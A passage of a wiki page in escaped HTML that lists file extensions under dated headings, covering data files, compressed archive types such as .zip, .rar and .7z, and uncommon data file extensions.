.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
